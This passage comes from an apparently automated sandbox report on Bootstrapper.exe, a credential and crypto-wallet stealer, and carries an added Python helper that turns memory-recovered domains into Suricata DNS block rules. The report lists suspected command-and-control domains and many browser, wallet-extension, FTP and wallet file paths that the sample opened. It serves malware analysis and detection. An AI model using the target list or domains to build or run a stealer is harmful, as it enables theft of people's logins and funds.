            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: bloodyswif.lat
            Source: Bootstrapper.exe, 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: jubbenjusk.biz
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\Bootstrapper.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\Bootstrapper.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
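Added example, not from the report or the sample: the nine hostnames above were recovered from the in-memory region at 0x2190000 (the same region the YARA rules matched), not from the file on disk, so they are candidate C2 names that a static string scan of Bootstrapper.exe never sees. This Python extracts hostnames from a raw memory region the way an analyst would after dumping it, handling both ASCII and UTF-16LE storage at either byte alignment, drops the benign bookmark hosts the report also lists (mozilla.org, google.com), groups the rest by TLD, and emits one Suricata dns.query rule per candidate. The memory blob is constructed inline from the report's domains; it is not the sample's memory, and the allowlist and rule message text are my own choices.

```python
import re

# Hostname grammar: labels of letters/digits/hyphens, then a 2-24 letter TLD.
_DOMAIN = r"(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,24}"
DOMAIN_ASCII = re.compile(_DOMAIN.encode())
DOMAIN_TEXT = re.compile(_DOMAIN)

# Hosts the report's other string hits show are harmless browser/bookmark residue.
ALLOWLIST = ("mozilla.org", "google.com", "microsoft.com")

def domains_in_memory(blob: bytes) -> set:
    """Pull hostnames out of a raw memory region whether they are stored as ASCII
    or as UTF-16LE (both occur in Windows processes), trying both 2-byte alignments."""
    found = {m.group(0).decode() for m in DOMAIN_ASCII.finditer(blob)}
    for offset in (0, 1):
        chunk = blob[offset:]
        chunk = chunk[:len(chunk) - len(chunk) % 2]          # UTF-16 needs an even length
        text = chunk.decode("utf-16-le", errors="replace")   # junk becomes U+FFFD, never [a-z0-9.]
        found.update(m.group(0) for m in DOMAIN_TEXT.finditer(text))
    return found

def is_allowlisted(host: str) -> bool:
    """Exact or parent-domain match against ALLOWLIST (no substring matching)."""
    return any(host == a or host.endswith("." + a) for a in ALLOWLIST)

def candidates_by_tld(hosts) -> dict:
    """Drop allowlisted hosts and bucket the rest by TLD: a cluster of fresh
    names on one cheap TLD (.lat here) is the rotation list worth blocking."""
    out = {}
    for h in sorted(hosts):
        if not is_allowlisted(h):
            out.setdefault(h.rsplit(".", 1)[1], []).append(h)
    return out

def suricata_dns_rules(hosts, base_sid: int = 1000001) -> list:
    """One Suricata DNS-query rule per host (dns.query sticky buffer, Suricata 5+)."""
    rules = []
    for i, h in enumerate(sorted(hosts)):
        rules.append(f'alert dns any any -> any any (msg:"Bootstrapper.exe C2 domain {h}"; '
                     f'dns.query; content:"{h}"; nocase; sid:{base_sid + i}; rev:1;)')
    return rules

def _constructed_region() -> bytes:
    """Constructed stand-in for the 0x2190000 region: domains from the report, some ASCII
    and some UTF-16LE at an odd offset, mixed with code bytes and a bookmark URL."""
    ascii_part = b"\0".join([b"finickypwk.lat", b"shoefeatthe.lat", b"jubbenjusk.biz",
                             b"https://www.mozilla.org/about/", b"\x90\x90\x8b\xec\x55",
                             b"www.google.com"])
    wide_part = "savorraiykj.lat\0kickykiduz.lat".encode("utf-16-le")
    return b"\0\0\0" + wide_part + b"\0" + ascii_part + b"\0\0"
```

Two practical points: run this on the dump of the unpacked region, not on Bootstrapper.exe, because the names are only present after the sample has decrypted them in memory; and block on the hostnames rather than on 172.67.219.181, since every TLS session in the report goes to that one shared front address, which will serve unrelated traffic as well.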

            Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: Bootstrapper.exe PID: 1036, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
Source: Bootstrapper.exe, 00000000.00000003.2266468578.0000000000890000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/JAXX New Version
Source: Bootstrapper.exe | String found in binary or memory: Wallets/Exodus
Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
Source: Bootstrapper.exe, 00000000.00000003.2266368056.0000000000857000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Bootstrapper.exe | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\Bootstrapper.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Bootstrapper.exe | Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\Desktop\Bootstrapper.exe | Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\Desktop\Bootstrapper.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\Desktop\Bootstrapper.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\Bootstrapper.exe | Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: Yara match | File source: Process Memory Space: Bootstrapper.exe PID: 1036, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Bootstrapper.exe PID: 1036, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

MITRE ATT&CK Matrix

Listed per tactic column, top to bottom; the numeric prefixes are the report's own count badges on the matched techniques.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 12 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 21 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 221 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 File and Directory Discovery; 22 System Information Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 41 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus Detection

Source | Detection | Scanner | Label | Link
